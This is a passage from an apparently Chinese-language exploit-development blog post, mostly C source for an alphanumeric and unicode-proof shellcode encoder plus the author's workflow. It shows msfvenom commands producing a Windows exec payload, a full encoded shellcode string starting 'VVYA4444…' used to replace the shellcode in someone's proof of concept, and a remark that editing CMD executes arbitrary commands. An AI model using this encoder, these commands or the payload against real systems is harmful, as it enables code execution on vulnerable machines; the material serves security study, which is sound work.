else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;

else if (strcmp(argv[i], "--sources") == 0) sources = 1;

else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;

else if (strcmp(argv[i], "-n") == 0) nonewline = 1;

else if (baseaddress == NULL) baseaddress = argv[i];

else

{

fprintf(stderr, "%s: more then one BASEADDRESS option: `%s' and `%s'\n"

"Try `%s --help' for more information.\n",

argv[0], baseaddress, argv[i], argv[0]);

exit(EXIT_FAILURE);

}

}

// No baseaddress option ?

if (baseaddress == NULL)

{

fprintf(stderr, "%s: missing BASEADDRESS options.\n"

"Try `%s --help' for more information.\n", argv[0], argv[0]);

exit(EXIT_FAILURE);

}

// The uppercase, unicode and nocompress option determine which decoder we'll

// need to use. For each combination of these options there is an array,

// indexed by the baseaddress with decoders. Pointers to these arrays have

// been put in another array, we can calculate the index into this second

// array like this:

options = uppercase+unicode*2+nocompress*4;

// decoders[options] will now point to an array of decoders for the specified

// options. The array contains one decoder for every possible baseaddress.

// Someone wants to know which baseaddress options the specified options

// for uppercase, unicode and/or nocompress allow:

if (sources)

{

printf("Available options for %s%s alphanumeric shellcode:\n",

uppercase ? "uppercase" : "mixedcase",

unicode ? " unicode-proof" : "");

for (i=0; decoders[options][i].id != NULL; i++)

{

printf("  %s\n", decoders[options][i].id);

}

printf("\n");

exit(EXIT_SUCCESS);

}

//TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI

if (uppercase)

{

if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";

else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";

} else

{

if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

}

// Find and output decoder

for (i=0; _stricmp(baseaddress, decoders[options][i].id) != 0; i++)

{

if (decoders[options][i+1].id == NULL)

{

fprintf(stderr, "%s: unrecognized baseaddress option `%s'\n"

"Try `%s %s%s--sources' for a list of BASEADDRESS options.\n",

argv[0], baseaddress, argv[0],

uppercase ? "--uppercase " : "",

unicode ? "--unicode " : "");

exit(EXIT_FAILURE);

}

}

printf("%s", decoders[options][i].code);

// system("pause");

// read, encode and output shellcode

for (int j=0;j

{

input=evil[j];

// encoding AB -> CD 00 EF 00

A = (input & 0xf0) >> 4;

B = (input & 0x0f);

F = B;

// E is arbitrary as long as EF is a valid character

i = rand() % strlen(valid_chars);

while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }

E = valid_chars[i] >> 4;

// normal code uses xor, unicode-proof uses ADD.

// AB ->

D =  unicode ? (A-E) & 0x0f : (A^E);

// C is arbitrary as long as CD is a valid character

i = rand() % strlen(valid_chars);

while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }

C = valid_chars[i] >> 4;

printf("%c%c", (C<<4)+D, (E<<4)+F);

}

//可以这样使用命令行下：alpha2 esp

//esp指向了shellcode

printf("A%s", nonewline ? "" : "\n"); // Terminating "A"

exit(EXIT_SUCCESS);

}

使用时把evil变量替换成自己的shellcode，再生成exe运行来生成编码。

上面代码中的evil是使用msf命令msfvenom -p windows/exec CMD="calc.exe"  -f c -b '\x00'生成的,和作者poc的效果一样运行了计算机。修改一下CMD的内容即可执行任意命令。

仔细观察发现作者poc的前缀VVYA4444444444出现在如下代码片段中：

uppercase_unicode_nocompress_decoders[] = {

{ "nops",    "44444444444444" uppercase_unicode_decoder_body },

{ "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },

{ "ecx",      "44444444444444" uppercase_unicode_decoder_body },

{ "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },

{ "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },

{ "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },

{ "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },

{ "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },

{ "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },

{ "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },

{ "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },

{ NULL, NULL }

};

所以我们得知了作者生成时使用的参数，于是使用如下命令生成最终的shellcode，其中ConsoleApplication1.exe是用上面的代码生成的：

ConsoleApplication1.exe --nocompress --unicode --uppercase esi VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYJJ1HYT4NDL4286ZKUL69ORTNIWYVQNQU37PLDNQPPN4M3PPLQN4NJSXJQPZZ5T1KQOKQO5DP0SKOKILS2PKPOX0TNMPMMMQKUQ44JOVVNYSZLBINOQO8LYXWCURKQ8KDJ2LR4LJXK4Q4UQNU4YNM80OG1FK60K4KIOJDQMIOYOLX0DOWRS7LRNQKWMLMKMYPDLYJ5Y2WNZ59TM2TOLVOZRKMPZEEBVK3VLVK1WUJU6KL2LQ3TRW3F4BNNL3MP2NXOHPWGJE8C5MWLURY7O0LPZ9KCUYDWLN42YYVSSZYO5Y8ZTKU5MLYR8LQV7P163VDJLUKKHE7P9XCYRSUVJK4Q3KV6SS5PZPRYHSOLXSONNK47SNN66D9NYZNKUYK07PRO8T2B9QLOO3RZU0KZBOOLBX1V9P793NJ5KQZXMLGH4Q1PXM1OLRKRLQKPA

替换原poc的shellcode，执行计算器成功。

0x02后记

其实这里因为不熟悉shellcode，所以绕了一圈去生成，其实是可以用msf直接生成的。。。

来自昊天实验室

一开始用msf的编码器生成shellcode发现开头有乱码，于是有了上一篇文章，足足绕了一大圈。

最后在大佬的提示下才发现是因为一开始没有指定寄存器。

所以直接用这个命令就能生成可用的shellcode了：

msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=ESI